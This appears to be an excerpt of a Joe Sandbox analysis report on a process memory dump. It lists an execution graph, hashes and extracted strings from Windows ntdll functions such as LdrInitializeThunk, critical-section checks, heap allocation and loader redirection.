                                          • Instruction ID: 8ad948098515f3e13c7231d44774af45fd058d0bf1160e599d6c5806f056526c
                                          • Opcode Fuzzy Hash: 40f95e8f86c44133e4bb4b556540624270473404b1b515323d14caf5a26ad8ac
                                          • Instruction Fuzzy Hash: 3ED0927095520EDAEB159AC0D6257AFBAB1BB3424BF32480AE402B6241EBB44645D6A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:0%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:24.7%
                                          Total number of Nodes:93
                                          Total number of Limit Nodes:1
                                          execution_graph 61464 24702c70 LdrInitializeThunk 61472 246bec6b 591 API calls 61576 246b826b 351 API calls __startOneArgErrorHandling 61578 246b9660 553 API calls 61581 246f9660 561 API calls __except_handler4 61479 246f9870 404 API calls 61588 246f724d 8 API calls 61480 2476705e 569 API calls __except_handler4 61481 246b7440 7 API calls 2 library calls 61589 246dfa40 558 API calls 2 library calls 61590 246f7a40 329 API calls 61483 246c2050 348 API calls 61484 246eb052 354 API calls ___swprintf_l 61592 246f4e50 LdrInitializeThunk __except_handler4 61595 246f8e2f 353 API calls 61596 246de627 349 API calls __except_handler4 61487 246be420 402 API calls __startOneArgErrorHandling 61488 246ba020 326 API calls 61489 246bc020 12 API calls 61493 246fbc3b 329 API calls __except_handler4 61600 246cba30 543 API calls 61494 246fa430 410 API calls ___swprintf_l 61602 246bea0c 592 API calls __except_handler4 61604 2474321f 376 API calls 2 library calls 61497 246f8402 553 API calls 2 library calls 61499 246fcc00 334 API calls 61606 246f8600 9 API calls 61465 24702c00 61467 24702c0a 61465->61467 61468 24702c11 61467->61468 61469 24702c1f LdrInitializeThunk 61467->61469 61610 246b8210 193 API calls 61613 246fa210 9 API calls 61503 247020f0 10 API calls 2 library calls 61615 246ba2e0 537 API calls 3 library calls 61616 246ed6e0 692 API calls 2 library calls 61506 246bc0f0 345 API calls 61618 246bfef0 13 API calls 61507 246c24f0 600 API calls 61508 246c98f0 577 API calls 61621 246bb2c0 345 API calls 61623 246eeac0 342 API calls 61510 246dccc2 201 API calls 61628 246fc6a6 552 API calls 2 library calls 61629 246c1ea0 18 API calls 61630 246d52a0 374 API calls 3 library calls 61513 246fbca0 541 API calls 61515 246b78b0 194 API calls 61516 246c3cb0 16 API calls 61633 246f3e8f 328 API calls 61520 246bb480 198 API calls 61636 246b7a80 346 API calls __except_handler4 61524 246f909c 347 API calls 2 library calls 61637 24716282 330 API calls 61638 2474368c 328 API calls 3 library calls 61525 246bb890 550 API calls 61640 246fba90 11 API calls 2 library calls 61641 2476437c 329 API calls 61646 246cc770 GetPEB __except_handler4 61531 246fb970 369 API calls 61649 24742349 587 API calls 3 library calls 61538 246bb120 412 API calls 61653 246c3720 339 API calls __startOneArgErrorHandling 61654 246eeb20 350 API calls 61655 246ff320 330 API calls 2 library calls 61657 246b7330 325 API calls ___swprintf_l 61661 246b8300 327 API calls 61663 246bbf00 336 API calls 61541 246c0100 566 API calls 2 library calls 61542 246c2102 204 API calls 61543 246be104 350 API calls 61665 246f7b13 708 API calls 61550 246b81e6 9 API calls 61552 246f59e0 330 API calls 61671 246ec3f0 331 API calls 61673 246ecbf0 GetPEB GetPEB GetPEB GetPEB 61555 246c59c0 779 API calls 2 library calls 61556 246e65c0 418 API calls ___swprintf_l 61559 246bc1d0 591 API calls 61561 246eadd0 335 API calls 61562 246ecdd0 GetPEB GetPEB 61676 246f97d0 332 API calls 61677 246f63d0 603 API calls 2 library calls 61565 246bc1a0 334 API calls 61567 246f6da0 332 API calls 61679 246f33a0 331 API calls __startOneArgErrorHandling 61572 246ef5b0 338 API calls 3 library calls 61573 246b65b5 553 API calls 2 library calls 61680 24779793 10 API calls __startOneArgErrorHandling 61681 246bbf80 350 API calls __except_handler4 61682 246c0780 350 API calls 61686 24702380 707 API calls __except_handler4 61687 246ba790 412 API calls

                                          Executed Functions

                                          Function 247035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6 247035c0-247035cc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f6533c8120cd26fc8ed25f6f5ba67a0820f98e1e678c1c68bea593e8510dec84
                                          • Instruction ID: 63c6aefa3400894ad09f6c7fb54010c673485f6b6f04bfba6079c49be3911a12
                                          • Opcode Fuzzy Hash: f6533c8120cd26fc8ed25f6f5ba67a0820f98e1e678c1c68bea593e8510dec84
                                          • Instruction Fuzzy Hash: 3C90023165950403D2107158455470620055BD1205F66C412A0565538D8795CA5165A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 4 24702c70-24702c7c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: fac6e52b20b01aa688c02922b8c7670003beca431305d40afd999bb3566c1bad
                                          • Instruction ID: 53283cb65f25324aa2d7eaf16e95ef12b8c599252a6a5585c075ad20d986ecb5
                                          • Opcode Fuzzy Hash: fac6e52b20b01aa688c02922b8c7670003beca431305d40afd999bb3566c1bad
                                          • Instruction Fuzzy Hash: 0D90023125548803D2207158844474A10055BD1305F5AC412A4565638D8795C9917121
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5 24702df0-24702dfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b7a42a2316495d0fd1866da22df4603bf0f95e8789648b2c025fd638d04d319f
                                          • Instruction ID: 6c89d6b9b49c522c758fd326aaa9e298ee31866f387c2a3d5762094525d15258
                                          • Opcode Fuzzy Hash: b7a42a2316495d0fd1866da22df4603bf0f95e8789648b2c025fd638d04d319f
                                          • Instruction Fuzzy Hash: 9690023125540413D2217158454470710095BD1245F96C413A0565538D9756CA52A121
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24702C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 24702c0a-24702c0f 1 24702c11-24702c18 0->1 2 24702c1f-24702c26 LdrInitializeThunk 0->2
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 16c069d5fa904ca80c2f5351449933de6e63ada08e3f40a281074406a258d180
                                          • Instruction ID: d4738f12f6bee16767344c79d0ec2141b55aa6a8bf88a323b7a169ab8da534f8
                                          • Opcode Fuzzy Hash: 16c069d5fa904ca80c2f5351449933de6e63ada08e3f40a281074406a258d180
                                          • Instruction Fuzzy Hash: 01B09B729465C5C6D711E760460871779407BD1705F16C066D2170671F4738C5D5E175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 246F8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 628 246f8620-246f8681 629 24735297-2473529d 628->629 630 246f8687-246f8698 628->630 629->630 631 247352a3-247352b0 GetPEB 629->631 631->630 632 247352b6-247352b9 631->632 633 247352d6-247352fc call 24702ce0 632->633 634 247352bb-247352c5 632->634 633->630 640 24735302-24735306 633->640 634->630 635 247352cb-247352d4 634->635 637 2473532d-24735341 call 246c54a0 635->637 643 24735347-24735353 637->643 640->630 642 2473530c-24735321 call 24702ce0 640->642 642->630 651 24735327 642->651 645 24735359-2473536d 643->645 646 2473555c-24735568 call 2473556d 643->646 649 2473538b-24735401 645->649 650 2473536f 645->650 646->630 656 24735403-24735435 call 246bfd50 649->656 657 2473543a-2473543d 649->657 653 24735371-24735378 650->653 651->637 653->649 655 2473537a-2473537c 653->655 658 24735383-24735385 655->658 659 2473537e-24735381 655->659 670 2473554d-24735552 call 2474a4b0 656->670 661 24735443-24735494 657->661 662 24735514-24735517 657->662 658->649 664 24735555-24735557 658->664 659->653 667 24735496-247354cc call 246bfd50 661->667 668 247354ce-24735512 call 246bfd50 * 2 661->668 662->664 665 24735519-24735548 call 246bfd50 662->665 664->643 665->670 667->670 668->670 670->664
                                          Strings
                                          • undeleted critical section in freed memory, xrefs: 2473542B
                                          • Critical section address, xrefs: 24735425, 247354BC, 24735534
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 247354E2
                                          • double initialized or corrupted critical section, xrefs: 24735508
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2473540A, 24735496, 24735519
                                          • Address of the debug info found in the active list., xrefs: 247354AE, 247354FA
                                          • 8, xrefs: 247352E3
                                          • Critical section address., xrefs: 24735502
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 24735543
                                          • Invalid debug info address of this critical section, xrefs: 247354B6
                                          • corrupted critical section, xrefs: 247354C2
                                          • Thread identifier, xrefs: 2473553A
                                          • Critical section debug info address, xrefs: 2473541F, 2473552E
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 247354CE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          • Opcode ID: fd4fc4301495fbae6fb346e9c7c97f325682090be3383091f2d2a19bc09269c2
                                          • Instruction ID: 27b9f11d175fdd0a99c28ab1f93609d167633c76a5f4ad0886301e66a9a3d151
                                          • Opcode Fuzzy Hash: fd4fc4301495fbae6fb346e9c7c97f325682090be3383091f2d2a19bc09269c2
                                          • Instruction Fuzzy Hash: 69817BB1A00668AFDB10CF96C884FAEBBB5FB08714F204159F515B7241D375AD44CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246BD08D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                          Download Yara Rule
                                          Strings
                                          • @, xrefs: 246BD2AF
                                          • @, xrefs: 246BD0FD
                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 246BD196
                                          • H/n$, xrefs: 2471A843
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 246BD2C3
                                          • @, xrefs: 246BD313
                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 246BD262
                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 246BD0CF
                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 246BD146
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/n$$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                          • API String ID: 0-2595481613
                                          • Opcode ID: e4cbde0ef62207c5fca53646e21441ef4f0044f106b2c4d242cf572e1271671e
                                          • Instruction ID: 271c6eb73e10e535eb904f87e94022ff3d9062a80e28389d0a56794c588d266c
                                          • Opcode Fuzzy Hash: e4cbde0ef62207c5fca53646e21441ef4f0044f106b2c4d242cf572e1271671e
                                          • Instruction Fuzzy Hash: 55A15E715083459FE321CF25C484B5BBBE8BB94765F00892EF698AB241E774DA48CF93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24759179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                          • API String ID: 0-3063724069
                                          • Opcode ID: 0e9c28b572ff55607b41eed42a0c9835348d17ee406856fc02f45a74d552af36
                                          • Instruction ID: 8eb1ff484dcbf7ccbe8cc0ee552f8c4093350f19ebe5953203bf177ab376d717
                                          • Opcode Fuzzy Hash: 0e9c28b572ff55607b41eed42a0c9835348d17ee406856fc02f45a74d552af36
                                          • Instruction Fuzzy Hash: 13D1C6F2805711AFD721CB54C880B6BBBE8AF94754F404969FE64AB360E770CD4887D2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 24770274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 0-1700792311
                                          • Opcode ID: d3686b52ae1fabcb034d2db6dc8e38dd8fd01e65d96cdd771348c1917472cc46
                                          • Instruction ID: 2866e15f1fdbbc864f3618025fb15e1dc925a1f32d2a343ff36091f1f7e7c9bb
                                          • Opcode Fuzzy Hash: d3686b52ae1fabcb034d2db6dc8e38dd8fd01e65d96cdd771348c1917472cc46
                                          • Instruction Fuzzy Hash: C0D1EB31600685EFDF06CF69C494AA9BBF1FF5A710F888059E8A5AB752C734E980CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246BF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: 3f3f6acdaf95e8a80a48bbc072429382d94f0de88bda12c1b7a3edc15c8c9820
                                          • Instruction ID: c5f51323b189832b4932b0eb6c17ce6df0a4245cbfb34af0f852f61f0a1cf658
                                          • Opcode Fuzzy Hash: 3f3f6acdaf95e8a80a48bbc072429382d94f0de88bda12c1b7a3edc15c8c9820
                                          • Instruction Fuzzy Hash: AF42FD312087819FD309CF29C884B1ABBE5FF98704F04496DE5AADB362D774E981CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246E51EF Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: H/n$$Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-485709890
                                          • Opcode ID: 01a4df347b3ace6e9c466f8f316747c797cd997888755a99a49af5f703b8d450
                                          • Instruction ID: 29a7262dbacb1a3bb186e9c19ad40fe42637b118ac8ebcd727ba2d4ef371b27a
                                          • Opcode Fuzzy Hash: 01a4df347b3ace6e9c466f8f316747c797cd997888755a99a49af5f703b8d450
                                          • Instruction Fuzzy Hash: A3F14C72E12619EFDB01CFE8C980DEEBBF9FF58610F11406AE515AB214E7709E018B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246DB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                          • API String ID: 0-122214566
                                          • Opcode ID: d40a9faf3f5e53fb1ea0f21d943d1a65c359b93dc6da383e4a1de4cc0817e4e1
                                          • Instruction ID: 3f46fd1628868014b4fe5a03445493a8eae136cc7ab9921703ea0870d2d5c1a9
                                          • Opcode Fuzzy Hash: d40a9faf3f5e53fb1ea0f21d943d1a65c359b93dc6da383e4a1de4cc0817e4e1
                                          • Instruction Fuzzy Hash: 81C17533B00616EBEB14CF64C880FBE7BA5AF54B04F1541A9E915AB389EB74CD44D391
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 2476F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                          • API String ID: 0-1745908468
                                          • Opcode ID: a9fb1d67aa031afaf61e366fb7678d1dea527278e07872ae8373dab3b39d1960
                                          • Instruction ID: b4763a8f14051e5918fd12fd977dd0a17ec0d6ae71f6dcd85a36b8bb5100fde0
                                          • Opcode Fuzzy Hash: a9fb1d67aa031afaf61e366fb7678d1dea527278e07872ae8373dab3b39d1960
                                          • Instruction Fuzzy Hash: C6912231A00645DFEB06CF69C480A9DBBF2FF19710F148099E8ABAB762CB759940CF14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 247321BF
                                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 24732178
                                          • RtlGetAssemblyStorageRoot, xrefs: 24732160, 2473219A, 247321BA
                                          • SXS: %s() passed the empty activation context, xrefs: 24732165
                                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 2473219F
                                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 24732180
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                          • API String ID: 0-861424205
                                          • Opcode ID: 1a41166e3108f77337ec4a24d21f622a6e8f93670b2b47661d7a39acebe98568
                                          • Instruction ID: 4700981524224685c92de88ac8f9ae8e10b253f444ab4cf8a7e2b28a9c6ad86c
                                          • Opcode Fuzzy Hash: 1a41166e3108f77337ec4a24d21f622a6e8f93670b2b47661d7a39acebe98568
                                          • Instruction Fuzzy Hash: C731E376F019247BE7118A968D94F5B7F78EB75A50F0200A9FA15AF24AD230DE00CEE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                          Download Yara Rule
                                          Strings
                                          • LdrpInitializeProcess, xrefs: 246FC6C4
                                          • LdrpInitializeImportRedirection, xrefs: 24738177, 247381EB
                                          • Loading import redirection DLL: '%wZ', xrefs: 24738170
                                          • minkernel\ntdll\ldrinit.c, xrefs: 246FC6C3
                                          • minkernel\ntdll\ldrredirect.c, xrefs: 24738181, 247381F5
                                          • Unable to build import redirection Table, Status = 0x%x, xrefs: 247381E5
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                          • API String ID: 0-475462383
                                          • Opcode ID: e34fd9e9d0176013adf474e784739d62c783bdbc62d19c7dbca771acc675bcde
                                          • Instruction ID: ba3fb5bcece88186ea8b93fda7bccf11ff8112aa78ab8c29c8cde59d907fd957
                                          • Opcode Fuzzy Hash: e34fd9e9d0176013adf474e784739d62c783bdbc62d19c7dbca771acc675bcde
                                          • Instruction Fuzzy Hash: 673112717097019FD214DF28CD89E6ABBE6EF94720F050568F895AB396E620DC04CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 246EF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                          Download Yara Rule
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 247302E7
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 247302BD
                                          • RTL: Re-Waiting, xrefs: 2473031E
